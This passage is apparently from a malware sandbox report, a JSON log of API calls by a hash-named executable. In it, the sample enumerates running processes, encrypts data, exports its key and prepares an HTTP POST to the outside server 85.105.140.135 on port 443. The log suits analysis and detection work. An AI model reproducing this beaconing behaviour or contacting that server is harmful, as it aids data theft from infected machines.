"name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 2498 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 2499 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 2500 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 2501 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 2502 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 2503 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 2504 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 2505 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 2506 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 2507 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 2508 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 2509 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 2510 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 2511 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 2512 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 2513 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 2514 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 2515 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 2516 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 2517 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 2518 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 2519 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 2520 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 2521 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 2522 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 2523 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 2524 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 2525 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 2526 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 2527 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 2528 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 2529 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 2530 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 2531 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 2532 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 2533 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 2534 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 2535 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9512" + } + ], + "repeated": 0, + "id": 2536 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9600" + } + ], + "repeated": 0, + "id": 2537 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9720" + } + ], + "repeated": 0, + "id": 2538 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "OneDrive.exe" + }, + { + "name": "ProcessId", + "value": "9972" + } + ], + "repeated": 0, + "id": 2539 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeBackgroundHost.exe" + }, + { + "name": "ProcessId", + "value": "7352" + } + ], + "repeated": 0, + "id": 2540 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "7144" + } + ], + "repeated": 0, + "id": 2541 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5208" + } + ], + "repeated": 0, + "id": 2542 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "9936" + } + ], + "repeated": 0, + "id": 2543 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "VSSVC.exe" + }, + { + "name": "ProcessId", + "value": "9848" + } + ], + "repeated": 0, + "id": 2544 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9892" + } + ], + "repeated": 0, + "id": 2545 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchFilterHost.exe" + }, + { + "name": "ProcessId", + "value": "9956" + } + ], + "repeated": 0, + "id": 2546 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "816" + } + ], + "repeated": 0, + "id": 2547 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2480" + } + ], + "repeated": 0, + "id": 2548 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sppsvc.exe" + }, + { + "name": "ProcessId", + "value": "8868" + } + ], + "repeated": 0, + "id": 2549 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "9700" + } + ], + "repeated": 0, + "id": 2550 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": false, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2551 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce461b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004ec" + } + ], + "repeated": 0, + "id": 2552 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce2f90", + "parentcaller": "0x03ce14ae", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x052ac000" + }, + { + "name": "RegionSize", + "value": "0x00056000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2553 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce1bde", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "CryptHash", + "value": "0x04e248c0" + }, + { + "name": "Buffer", + "value": "\n`{z:k7\\x1e`\\xcd\\xf9~\\x19\\x14\\x03lc\\xbeo_\\xb9\\xbd\\xd8\\x99!/8N\\xcfktc?q=-\\xffXp8\\xcb\\xb5\\xea\\xe38\\xf4\\x8b\\x91\\xec\\x06\\xc2\\x98t\\x9d2d\\xd7\\xc4\\xdd\\xe8\\xd6\\xf6\\xa27>z\\xd5\\xd7\\x1b\r+\\x15\\x8d;n\\x9e6k\\xd7y^\\x07\\x03rA>\\xbd\\x83\\xf7\\xe7\\x13\\xc6I\\x929\\xf5\\x1b)\\xf4\\xf8d\\xbd\\x88{\\xa8\\xe1\\xeb:J\\x8b\\xc4#\\xd2r\\xf2\\xd7N\\x93\\xd1\\x9c\\xa0x\\xb6\\x16\\xa3\\xdb`\\x8c@H&\\x9fv\\xad\\xc1\\xd2\\x01\\xbeQ\\xc6(0#g\\xec\\xc3\\x0e \\x86\\x104\\xb9vd\\xb3.\\x18\\x8cA\\x1bE\\xc4o\\xaf\\xfc\r\\x90\\x07\\x9b6[\\xeb\\x05sc\\x86\\xa6\\x86\\xb3\\xb8s\\x98\\xe9\\xed\\xbd\\xc3\\x811\\x7f\\xd1q\\x0c\\xe8\\xd4\\xd2\\x1f\\xc6\\x06\\xaaf\\xd9-\\xc6S\\xeb\\xaf\\xcf\\xfc!r\\x04\\xda>w\\xb9d[\\x0bz\\x88\\x16\\xb0C!\\x00\\x1a\\xe7\\xfcYD#\\xec\\x15,\\xc3~\\x10A\\xe5\\xff\\xa0u@1\\xfb[R\\xd2x\\x99\\xeb\\xe7\\x83\\xc8\\xe8\\xae" + }, + { + "name": "Length", + "value": "608" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 2554 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00\\x96cJ\\xa9S\\xf5\\xa4%@\\xe6,\\x95p\\xa4\\xd8g\\xd0\\xe5\\xd9\\x13\\xc4\\x0c\\xa5zF=\\x8a\\xcc\\xfc\\x01+7\\x08\\x80\\xfc\\xc9\\xffj\\xfbW\\x08\\xd3\\xce \\xaf\\x98\\x1a\\xb9\\xc3h\\xcc\\xe0lw\n\\xb4$\\xf6l\\x8dx\\xc6\\x85\\x08]\\xd8\\x05r%F+\\x0c\\x7f\\x83L\\xf6u.yN\\xf4\\xe7\\xc6V[3\\xa33f\\xc2G\\x8bo\\xd3_\\xba" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 2555 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e248c0" + } + ], + "repeated": 0, + "id": 2556 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 2557 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 2558 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2559 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "85.105.140.135" + }, + { + "name": "ServerPort", + "value": "443" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2560 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "fVEvx1RAzHe/6QbfAi/orpr/2XrB0aoHVLYsqPBnOV/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 2561 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 2562 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x0529cef0" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "h\\xa4)\\x05" + } + ], + "repeated": 0, + "id": 2563 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 2564 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c4" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2565 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004dc" + } + ], + "repeated": 0, + "id": 2566 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 2567 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x7335d6d6", + "parentcaller": "0x7338784c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2568 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 2569 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c8" + } + ], + "repeated": 0, + "id": 2570 + }, + { + "timestamp": "2025-03-07 